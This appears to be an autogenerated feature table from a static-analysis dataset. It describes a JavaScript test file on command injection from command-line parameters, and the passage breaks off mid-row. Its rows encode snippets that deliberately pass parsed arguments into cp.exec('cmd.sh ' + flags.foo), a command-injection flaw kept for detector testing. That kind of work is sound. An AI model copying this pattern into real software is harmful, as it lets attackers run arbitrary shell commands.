autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:2:92:31 | exceptional return of cp.exec ... gs.foo) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:2:92:31 | exceptional return of cp.exec ... gs.foo) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:2:92:31 | exceptional return of cp.exec ... gs.foo) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:2:92:31 | exceptional return of cp.exec ... gs.foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:5:92:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:5:92:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:5:92:8 | exec | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:5:92:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:5:92:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:10:92:18 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:10:92:18 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:10:92:18 | "cmd.sh " | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:10:92:18 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:10:92:18 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:10:92:18 | "cmd.sh " | stringConcatenatedWith | -endpoint- flags.foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:10:92:30 | "cmd.sh ... ags.foo | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:10:92:30 | "cmd.sh ... ags.foo | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:10:92:30 | "cmd.sh ... ags.foo | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:10:92:30 | "cmd.sh ... ags.foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:10:92:30 | "cmd.sh ... ags.foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:10:92:30 | "cmd.sh ... ags.foo | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:10:92:30 | "cmd.sh ... ags.foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:10:92:30 | "cmd.sh ... ags.foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:10:92:30 | "cmd.sh ... ags.foo | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:22:92:26 | flags | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:22:92:26 | flags | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:22:92:26 | flags | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:22:92:26 | flags | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:22:92:26 | flags | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:22:92:30 | flags.foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:22:92:30 | flags.foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:22:92:30 | flags.foo | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:22:92:30 | flags.foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:22:92:30 | flags.foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:22:92:30 | flags.foo | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:28:92:30 | foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:28:92:30 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:28:92:30 | foo | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:28:92:30 | foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:28:92:30 | foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:95:1 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:95:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:95:1 | cp | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:95:1 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:95:1 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:95:1 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:95:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:95:1 | require | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:95:1 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:95:1 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:95:1 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:95:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:95:1 | this | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:95:1 | this | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:95:1 | this | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:103:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:103:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:103:1 | 'arguments' object of anonymous function | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:103:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:103:1 | 'arguments' object of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:103:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:103:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:103:1 | exceptional return of anonymous function | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:103:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:103:1 | exceptional return of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:103:1 | functio ... OT OK\\n} | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:103:1 | functio ... OT OK\\n} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:103:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:103:1 | functio ... OT OK\\n} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:103:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:103:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:103:1 | return of anonymous function | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:103:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:95:2:103:1 | return of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:8:96:25 | { ArgumentParser } | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:8:96:25 | { ArgumentParser } | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:8:96:25 | { ArgumentParser } | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:8:96:25 | { ArgumentParser } | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:8:96:25 | { ArgumentParser } | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:8:96:47 | ArgumentParser | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:8:96:47 | ArgumentParser | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:8:96:47 | ArgumentParser | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:8:96:47 | ArgumentParser | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:8:96:47 | ArgumentParser | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:8:96:47 | { Argum ... parse') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:8:96:47 | { Argum ... parse') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:8:96:47 | { Argum ... parse') | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:8:96:47 | { Argum ... parse') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:8:96:47 | { Argum ... parse') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:10:96:23 | ArgumentParser | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:10:96:23 | ArgumentParser | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:10:96:23 | ArgumentParser | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:10:96:23 | ArgumentParser | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:10:96:23 | ArgumentParser | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:10:96:23 | ArgumentParser | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:10:96:23 | ArgumentParser | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:10:96:23 | ArgumentParser | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:10:96:23 | ArgumentParser | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:10:96:23 | ArgumentParser | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:10:96:23 | ArgumentParser | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:10:96:23 | ArgumentParser | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:10:96:23 | ArgumentParser | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:10:96:23 | ArgumentParser | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:10:96:23 | ArgumentParser | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:10:96:23 | ArgumentParser | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:10:96:23 | ArgumentParser | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:10:96:23 | ArgumentParser | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:10:96:23 | ArgumentParser | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:10:96:23 | ArgumentParser | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:29:96:35 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:29:96:35 | require | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:29:96:35 | require | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:29:96:35 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:29:96:35 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:29:96:47 | exceptional return of require('argparse') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:29:96:47 | exceptional return of require('argparse') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:29:96:47 | exceptional return of require('argparse') | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:29:96:47 | exceptional return of require('argparse') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:29:96:47 | exceptional return of require('argparse') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:29:96:47 | require('argparse') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:29:96:47 | require('argparse') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:29:96:47 | require('argparse') | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:29:96:47 | require('argparse') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:29:96:47 | require('argparse') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:37:96:46 | 'argparse' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:37:96:46 | 'argparse' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:37:96:46 | 'argparse' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:37:96:46 | 'argparse' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:37:96:46 | 'argparse' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:37:96:46 | 'argparse' | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:37:96:46 | 'argparse' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:37:96:46 | 'argparse' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:8:98:13 | parser | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:8:98:13 | parser | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:8:98:13 | parser | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:8:98:13 | parser | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:8:98:13 | parser | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:8:98:69 | parser | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:8:98:69 | parser | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:8:98:69 | parser | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:8:98:69 | parser | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:8:98:69 | parser | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:8:98:69 | parser ... mple'}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:8:98:69 | parser ... mple'}) | 